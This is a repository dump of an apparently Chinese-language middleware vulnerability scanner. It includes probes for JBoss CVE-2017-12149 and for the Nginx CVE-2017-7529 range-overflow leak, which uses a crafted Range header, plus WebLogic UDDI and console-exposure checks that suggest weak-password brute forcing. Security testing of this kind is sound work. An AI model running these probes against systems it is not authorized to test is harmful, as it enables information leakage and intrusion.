├── _update.py
├── plugins
├── __init__.py
├── __pycache__
│ ├── plugins.cpython-37.pyc
│ ├── __init__.cpython-37.pyc
│ ├── user_agent.cpython-37.pyc
│ ├── axis_plugin.cpython-37.pyc
│ ├── jboss_plugin.cpython-37.pyc
│ ├── resin_plugin.cpython-37.pyc
│ ├── special_plugin_.cpython-37.pyc
│ ├── struts2_plugin.cpython-37.pyc
│ ├── tomcat_plugin.cpython-37.pyc
│ ├── weblogic_plugin.cpython-37.pyc
│ ├── glassfish_plugin.cpython-37.pyc
│ ├── IIS_special_plugin_.cpython-37.pyc
│ ├── Nginx_special_plugin_.cpython-37.pyc
│ ├── jboss_special_plugin_.cpython-37.pyc
│ ├── spring_special_plugin_.cpython-37.pyc
│ ├── tomcat_special_plugin_.cpython-37.pyc
│ ├── struts2_special_plugin_.cpython-37.pyc
│ └── weblogic_special_plugin_.cpython-37.pyc
├── weblogic_poc
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── uddi_ssrf.cpython-37.pyc
│ │ ├── CVE_2015_4852.cpython-37.pyc
│ │ ├── CVE_2016_0638.cpython-37.pyc
│ │ ├── CVE_2016_3510.cpython-37.pyc
│ │ ├── CVE_2017_3248.cpython-37.pyc
│ │ ├── CVE_2017_3506.cpython-37.pyc
│ │ ├── CVE_2018_2628.cpython-37.pyc
│ │ ├── CVE_2018_2893.cpython-37.pyc
│ │ └── managerURL200.cpython-37.pyc
│ ├── __init__.py
│ ├── uddi_ssrf.py
│ ├── managerURL200.py
│ ├── CVE_2017_3506.py
│ ├── CVE_2018_2628.py
│ ├── CVE_2018_2893.py
│ ├── CVE_2017_3248.py
│ ├── CVE_2016_0638.py
│ ├── CVE_2016_3510.py
│ └── CVE_2015_4852.py
├── README.md
├── CVE的原理分析网址处理脚本
│ ├── temp2.txt
│ ├── deal.py
│ ├── deal2.py
│ └── temp.txt
├── poc模板.py
├── struts2_plugin.py
├── weblogic_plugin.py
├── tomcat_plugin.py
├── weblogic_exp
│ ├── __init__.py
│ ├── CVE_2017_10271_win.py
│ ├── CVE_2018_2894.py
│ ├── CVE_2017_10271_linux.py
│ └── CVE_2018_2893.py
├── jboss_special_plugin_.py
├── Nginx_special_plugin_.py
├── special_plugin_.py
├── jboss_plugin.py
├── axis_plugin.py
├── IIS_special_plugin_.py
├── glassfish_plugin.py
├── weblogic_special_plugin_.py
├── spring_special_plugin_.py
├── resin_plugin.py
├── tomcat_special_plugin_.py
├── plugins.py
└── user_agent.py
├── urls.txt
├── .gitattributes
├── test.py
├── __pycache__
└── config.cpython-37.pyc
├── .idea
├── inspectionProfiles
│ └── profiles_settings.xml
├── misc.xml
├── modules.xml
├── N-MiddlewareScan.iml
└── workspace.xml
├── old_plugins
├── plugins.py
├── axis.py
├── glassfish.py
└── user_agent.py
├── config.py
├── Github_README_deal.py
├── N-MiddlewareScan.py
└── README.md
/_update.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/plugins/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/urls.txt:
--------------------------------------------------------------------------------
1 | https://www.baidu.com
2 | https://www.qq.com
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
1 | import re
url="https://baidu.comas.as"
# NOTE(review): a quantifier with nothing before it ("{2}" at the very
# start) is rejected by Python's re module ("nothing to repeat"), so this
# line raises re.error instead of testing the URL; the pattern that was
# intended is not recoverable from this scratch file.
if re.match(r"{2}\w.+$", url):
    print("aaaaaaa")
--------------------------------------------------------------------------------
/__pycache__/config.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/__pycache__/config.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/plugins.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/plugins.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/user_agent.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/user_agent.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/axis_plugin.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/axis_plugin.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/jboss_plugin.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/jboss_plugin.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/resin_plugin.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/resin_plugin.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/struts2_plugin.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/struts2_plugin.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/tomcat_plugin.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/tomcat_plugin.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/weblogic_plugin.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/weblogic_plugin.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/glassfish_plugin.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/glassfish_plugin.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/spring_special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nihaohello/N-MiddlewareScan/HEAD/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/plugins/README.md:
--------------------------------------------------------------------------------
1 | #plugins vuln poc exp
2 | 主要是下面模块:
3 | 1.axis
4 | xss 弱密码
5 | 2.glassfish
6 | 3.jboss
7 | 4.resin
8 | 5.weblogic
9 | 6.tomcat
10 | 7.struts2
11 | 8.IIS
12 | 9.fastcgi
13 | 10.phpcgi
14 | 11.apache
15 | 12.nginx
16 | 13.spring mvc
17 |
18 |
--------------------------------------------------------------------------------
/plugins/CVE的原理分析网址处理脚本/temp2.txt:
--------------------------------------------------------------------------------
1 | CVE_2018_9158
2 | CVE_2018_9157
3 | CVE_2018_9156
4 | CVE_2018_8032
5 | CVE_2018_19334
6 | CVE_2018_10664
7 | CVE_2018_10663
8 | CVE_2018_10662
9 | CVE_2018_10661
10 | CVE_2018_10660
11 | CVE_2018_10659
12 | CVE_2018_10658
13 | CVE_2017_9765
14 | CVE_2017_15885
15 | CVE_2017_12413
--------------------------------------------------------------------------------
/plugins/poc模板.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# Blank PoC entry: copy this dict once per check and fill the fields in.
# The key set is the one shared by the *_plugin.py tables; the code that
# consumes these keys is not in this file.
pocs = [
    dict(
        requests_option="",
        url=[],
        params=[],
        data=[],
        flag=[],
        success="",
        fail="",
        end="",
        admin_bursk="",
        username=[],
        password=[],
    ),
]
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/plugins/struts2_plugin.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# Struts2 PoC table: currently a single placeholder entry with every field
# left empty (same key set as the other *_plugin.py tables).
_EMPTY_STRUTS2_ENTRY = {
    "requests_option": "",
    "url": [],
    "params": [],
    "data": [],
    "flag": [],
    "success": "",
    "fail": "",
    "end": "",
    "admin_bursk": "",
    "username": [],
    "password": [],
}

pocs = [_EMPTY_STRUTS2_ENTRY]
--------------------------------------------------------------------------------
/plugins/weblogic_plugin.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# WebLogic PoC table: one placeholder entry, all fields empty. The WebLogic
# checks themselves live in weblogic_poc/ and weblogic_exp/, not here.
pocs = [
    dict(
        requests_option="",
        url=[],
        params=[],
        data=[],
        flag=[],
        success="",
        fail="",
        end="",
        admin_bursk="",
        username=[],
        password=[],
    ),
]
--------------------------------------------------------------------------------
/.idea/N-MiddlewareScan.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/plugins/tomcat_plugin.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
# Tomcat PoC table: one entry naming the manager upload path; every other
# field (verb, flags, messages, credentials) is still empty.
_TOMCAT_ENTRY = {
    "requests_option": "",
    "url": ["/manager/html/upload"],
    "params": [],
    "data": [],
    "flag": [],
    "success": "",
    "fail": "",
    "end": "",
    "admin_bursk": "",
    "username": [],
    "password": [],
}

pocs = [_TOMCAT_ENTRY]
--------------------------------------------------------------------------------
/plugins/CVE的原理分析网址处理脚本/deal.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
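# Print the identifier from each line of temp.txt with "-" turned into "_"
# (presumably the CVE_YYYY_NNNN spelling used for the poc module names).
# Iterating the handle avoids materialising the whole file with readlines(),
# and the explicit close() the original had is redundant under `with`.
with open("temp.txt", encoding="utf-8") as f:
    for line in f:
        # Only the first space-separated field of the line is the identifier.
        ident = line.rstrip("\n").split(" ")[0]
        print(ident.replace("-", "_"))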
10 |
--------------------------------------------------------------------------------
/plugins/weblogic_poc/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 |
--------------------------------------------------------------------------------
/plugins/weblogic_exp/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 |
--------------------------------------------------------------------------------
/old_plugins/plugins.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import sys
3 | sys.path.append("plugins")
4 | from axis import axis
5 | from glassfish import glassfish
6 | from resin import resin
class plugins(object):
    """Run the old-style plugin functions against one URL, in a fixed order.

    Args:
        url: target handed to every plugin function.
        options: kept on the instance; run() does not read it.
    """

    def __init__(self, url, options):
        self.url = url
        self.options = options

    def run(self):
        """Call axis, glassfish and resin on self.url, in that order."""
        # Same call sequence as before; only the shape of the code changed.
        for scanner in (axis, glassfish, resin):
            scanner(self.url)
        # others
16 |
17 |
18 |
--------------------------------------------------------------------------------
/config.py:
--------------------------------------------------------------------------------
# Scanner tuning values; the modules that read them are not in this file.
ThreadNum = 50
Process = 30
Timeout = 6
port = 80

# ANSI colour escapes for console output (Linux / ANSI-capable terminals).
RED = '\033[31m'      # red
GREEN = '\033[32m'    # green
YELLOW = '\033[33m'   # yellow
BLUE = '\033[34m'     # blue
FUCHSIA = '\033[35m'  # fuchsia
CYAN = '\033[36m'     # cyan
WHITE = '\033[37m'    # white
23 |
--------------------------------------------------------------------------------
/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Github_README_deal.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import os
3 |
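def re_README(file):
    """Rewrite *file* in place so every line ends with a trailing space.

    Each line loses its newline and surrounding spaces and is written back
    as ``line + " \\n"`` (a markdown hard line break).

    Args:
        file: path of the text file to rewrite; read and written as UTF-8.

    Raises:
        OSError: if the file cannot be read or written.
    """
    # Read under a context manager so the handle is closed even when reading
    # fails (the original left it open on error).
    with open(file, encoding="utf-8") as fh:
        lines = [line.strip("\n").strip(" ") + " \n" for line in fh]
    # The file is truncated only after the read completed, so a read error
    # cannot leave it empty.
    with open(file, "w", encoding="utf-8") as fh:
        fh.writelines(lines)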
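def list_file(dir_name):
    """Walk *dir_name* recursively and rewrite every README.md found.

    Directories are recursed into; a file whose name contains "README.md"
    is printed and passed to re_README().

    Args:
        dir_name: directory to scan; relative paths are made absolute.

    Raises:
        OSError: if a directory cannot be listed.
    """
    root = os.path.abspath(dir_name)
    for entry in os.listdir(root):
        # os.path.join instead of a hard-coded "\\" so this also works off Windows.
        path = os.path.join(root, entry)
        if os.path.isdir(path):
            list_file(path)
        # Match on the file name only; the original tested the whole path,
        # so a parent directory containing "README.md" matched every file in it.
        elif "README.md" in entry:
            print(path)
            re_README(path)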
28 |
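if __name__ == "__main__":
    # os.path.dirname(__file__) is "" when the script is started from its own
    # directory, and os.listdir("") fails; taking abspath first makes the walk
    # start at the script's folder either way. The guard keeps an import of
    # this module from rewriting files.
    dir_name = os.path.dirname(os.path.abspath(__file__))
    print(dir_name)
    list_file(dir_name)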
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/plugins/CVE的原理分析网址处理脚本/deal2.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import requests
3 | import re
4 | from concurrent.futures import ThreadPoolExecutor
5 | import traceback
6 | '''
7 | s=requests.get(url="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9158")
8 | s=s.text
9 | s=re.findall("MISC:http.*",s)[0].rstrip("").lstrip("MISC")
10 | print(s)
11 | '''
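_MISC_PREFIX = "MISC:"


def _extract_misc_link(html):
    """Return the text after the first ``MISC:http`` reference in *html*.

    Args:
        html: page body of a cve.mitre.org entry.

    Returns:
        The rest of that line after the "MISC:" prefix, or None when the
        page carries no such reference (the original indexed [0] and let the
        IndexError fall into its catch-all).
    """
    matches = re.findall(r"MISC:http.*", html)
    if not matches:
        return None
    # Prefix removal by length: the original lstrip("MISC:") strips a
    # character set, not the literal prefix.
    return matches[0][len(_MISC_PREFIX):]


def requests_url(cve):
    """Fetch the MITRE entry for *cve* and print its first MISC reference.

    Args:
        cve: CVE identifier; temp2.txt spells them CVE_YYYY_NNNN while the
            MITRE query (see the commented example above) uses hyphens, so
            underscores are normalised here.

    Failures are printed, never raised, matching the original best-effort
    behaviour.
    """
    url = "http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + cve.replace("_", "-")
    try:
        # Bounded wait so one unreachable host cannot stall the worker pool.
        resp = requests.get(url=url, timeout=10)
        link = _extract_misc_link(resp.text)
    except Exception:
        # print_exc() writes the trace itself; the original also printed
        # its None return value.
        traceback.print_exc()
        return
    if link is None:
        print("{}: no MISC reference found".format(cve))
    else:
        print(link)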
21 |
22 |
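# One pool for the whole file. The original opened a new pool per line and,
# by writing submit(requests_url(name)), ran each lookup synchronously in the
# main thread before submitting its None return value to the pool.
with open("temp2.txt") as f, ThreadPoolExecutor(40) as pool:
    for raw in f:
        name = raw.rstrip("\n")
        if name:  # skip blank lines rather than querying an empty id
            pool.submit(requests_url, name)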
29 |
30 |
31 |
32 |
--------------------------------------------------------------------------------
/plugins/jboss_special_plugin_.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
import socket
import sys
import urllib.parse

import requests
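def _target_host(url):
    """Return the host part of *url*; input without a scheme is accepted.

    The original used str.strip("http://"), which strips a *character set*
    (h, t, p, ':', '/') from both ends and so mangles any URL with a path
    or a trailing slash ("http://host/path/" became "host/pat").
    """
    parsed = urllib.parse.urlsplit(url if "://" in url else "//" + url)
    return parsed.hostname or url


def CVE_2017_12149(arg, config):
    """Fingerprint the JBoss JMXInvokerServlet on port 8080 for CVE-2017-12149.

    A single GET is sent and the reply is reported as matching when it is a
    200 whose Content-Type mentions "serialized"; nothing is posted or
    deserialized.

    Args:
        arg: object carrying the target in ``arg.url``.
        config: unused here; kept for the plugin call convention.

    Results and failures are printed, never raised.
    """
    try:
        port = 8080  # hard-coded: the scheme and port of arg.url are ignored
        ip = socket.gethostbyname(_target_host(arg.url))
        url = 'http://{}:{}/invoker/JMXInvokerServlet'.format(ip, port)
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
        r = requests.get(
            url, headers=headers, timeout=10, allow_redirects=False)
        if r.status_code == 200:
            # requests' header map is case-insensitive, so one lookup covers
            # both spellings, and a missing header no longer raises KeyError.
            content_type = r.headers.get('Content-Type', '')
            if 'serialized' in content_type:
                print('[ok] -> {}:{}'.format(ip, port))
            else:
                print("不存在 CVE_2017_12149 反序列化漏洞")
    except Exception as e:
        # Same one-line report as before, now with the cause attached.
        print("CVE_2017_12149 检测函数出错: {!r}".format(e))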
def jboss_special_plugin_(arg, config):
    """Plugin entry point for JBoss: run each registered check with the same arguments."""
    checks = (CVE_2017_12149,)
    for check in checks:
        check(arg, config)
23 |
24 |
--------------------------------------------------------------------------------
/plugins/Nginx_special_plugin_.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | # Nginx信息泄露!python3 NginxCVE-2017-7529.py http://207.246.80.61:8000/proxy/demo.png
3 | # 敏感信息有KEY等等
4 | import requests
5 | from termcolor import cprint
6 |
class NginxCVE_2017_7529():
    """Probe for the nginx range-filter integer overflow (CVE-2017-7529).

    Only the response status is inspected; the 500 bytes read from the
    stream are discarded.
    """

    def attack(self, url: str) -> None:
        """Send one crafted Range request to *url* and print a verdict.

        A 206 reply is reported as the vulnerable case. Every exception
        (timeout, DNS failure, missing Content-Length, ...) ends in the same
        "连接超时" line, so that message does not necessarily mean a timeout.
        """
        try:
            # The first request has no timeout; only the second is bounded.
            a = requests.get(url)
            # Raises KeyError when the server omits Content-Length.
            start = int(a.headers['Content-Length']) + 300
            end = 0x8000000000000000 - start

            headers = {
                "Range": "bytes=-{},-{}".format(start, end)
            }
            res = requests.get(url=url, headers=headers, stream=True, timeout=10)
            ret = res.raw.read(500)  # read but never used
            code = res.status_code

            if code == 206:
                print( "[+]存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)")
            else:
                print("[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)")
        except Exception as e:
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
28 |
def Nginx_special_plugin_(arg, config):
    """Plugin entry point for nginx: run the CVE-2017-7529 probe against arg.url."""
    probe = NginxCVE_2017_7529()
    probe.attack(arg.url)
--------------------------------------------------------------------------------
/plugins/weblogic_poc/uddi_ssrf.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import sys
12 | import requests
13 |
# Fixed User-Agent sent with every request from this module (it also makes
# the scanner's requests easy to recognise in server logs).
headers = {'user-agent': 'ceshi/0.0.1'}
15 |
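def islive(ur, port, timeout=10):
    """GET http://<ur>:<port>/uddiexplorer/ and return the HTTP status code.

    Args:
        ur: host name or IP of the WebLogic server.
        port: TCP port of its HTTP listener.
        timeout: seconds to wait for connect/read. The original had no
            timeout, so an unresponsive host blocked the scan forever; 10 is
            a constructed default (config.Timeout is not imported here).

    Returns:
        The integer status code of the response.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    url = 'http://{!s}:{!s}/uddiexplorer/'.format(ur, port)
    r = requests.get(url, headers=headers, timeout=timeout)
    return r.status_code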
21 |
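def run(url, port):
    """Report whether the UDDI explorer path exists on the target.

    Args:
        url: host name or IP (despite the name, not a full URL).
        port: WebLogic HTTP port.

    Prints one line either way. Exceptions from the probe are reported with
    their type and message rather than raised.
    """
    target = 'http://' + str(url) + ':' + str(port) + '/uddiexplorer/'
    try:
        found = islive(url, port) == 200
    except Exception as e:
        # The original message misspelled the module ("uudi") and hid the cause.
        print("uddi_ssrf脚本出错: {!r}".format(e))
        return
    if found:
        print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format(target)))
    else:
        print("[-]目标weblogic UDDI组件默认路径不存在!")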
31 |
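if __name__ == "__main__":
    # Usage: uddi_ssrf.py <host> <port>; a missing argument used to surface
    # as an IndexError traceback.
    if len(sys.argv) < 3:
        sys.exit("usage: {} <host> <port>".format(sys.argv[0]))
    url = sys.argv[1]
    port = int(sys.argv[2])
    run(url, port)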
--------------------------------------------------------------------------------
/plugins/weblogic_poc/managerURL200.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 | '''
4 | ____ _ _ _ _ __ __ _
5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
9 |
10 | '''
11 | import sys
12 | import requests
13 |
# Fixed User-Agent sent with every request from this module (it also makes
# the scanner's requests easy to recognise in server logs).
headers = {'user-agent': 'ceshi/0.0.1'}
15 |
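def islive(ur, port, timeout=10):
    """GET the WebLogic console login page and return the HTTP status code.

    Args:
        ur: host name or IP of the WebLogic server.
        port: TCP port of its HTTP listener.
        timeout: seconds to wait for connect/read. The original had no
            timeout, so an unresponsive host blocked the scan forever; 10 is
            a constructed default (config.Timeout is not imported here).

    Returns:
        The integer status code of the response.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    url = 'http://{!s}:{!s}/console/login/LoginForm.jsp'.format(ur, port)
    r = requests.get(url, headers=headers, timeout=timeout)
    return r.status_code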
20 |
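def run(url, port):
    """Report whether the WebLogic console login page is reachable.

    Args:
        url: host name or IP (despite the name, not a full URL).
        port: WebLogic HTTP port.

    Prints one line either way. Exceptions from the probe are reported with
    their type and message rather than raised.
    """
    u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp'
    try:
        found = islive(url, port) == 200
    except Exception as e:
        # Keep the original one-line report but include the cause.
        print("managerURL200脚本出错: {!r}".format(e))
        return
    if found:
        print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
    else:
        print("[-]目标weblogic控制台地址未找到!")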
30 |
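if __name__ == "__main__":
    # Usage: managerURL200.py <host> <port>; a missing argument used to
    # surface as an IndexError traceback.
    if len(sys.argv) < 3:
        sys.exit("usage: {} <host> <port>".format(sys.argv[0]))
    url = sys.argv[1]
    port = int(sys.argv[2])
    run(url, port)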
35 | # run('127.0.0.1',7001)
--------------------------------------------------------------------------------
/plugins/special_plugin_.py:
--------------------------------------------------------------------------------
1 | #coding=utf-8
2 | import threading
3 | import sys
4 | sys.path.append("plugin")
5 | from plugins.tomcat_special_plugin_ import tomcat_special_plugin_
6 | from plugins.weblogic_special_plugin_ import weblogic_special_plugin_
7 | from plugins.struts2_special_plugin_ import struts2_special_plugin_
8 | from plugins.jboss_special_plugin_ import jboss_special_plugin_
9 | from plugins.spring_special_plugin_ import spring_special_plugin_
10 | from plugins.IIS_special_plugin_ import IIS_special_plugin_
11 | from plugins.Nginx_special_plugin_ import Nginx_special_plugin_
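def special_plugin_(arg, config):
    """Run every *_special_plugin_ check against the target, one thread each.

    Args:
        arg: object carrying the target (the checks read ``arg.url``).
        config: scanner configuration passed through to each check.

    Returns once all checks have finished.
    """
    checks = (
        tomcat_special_plugin_,
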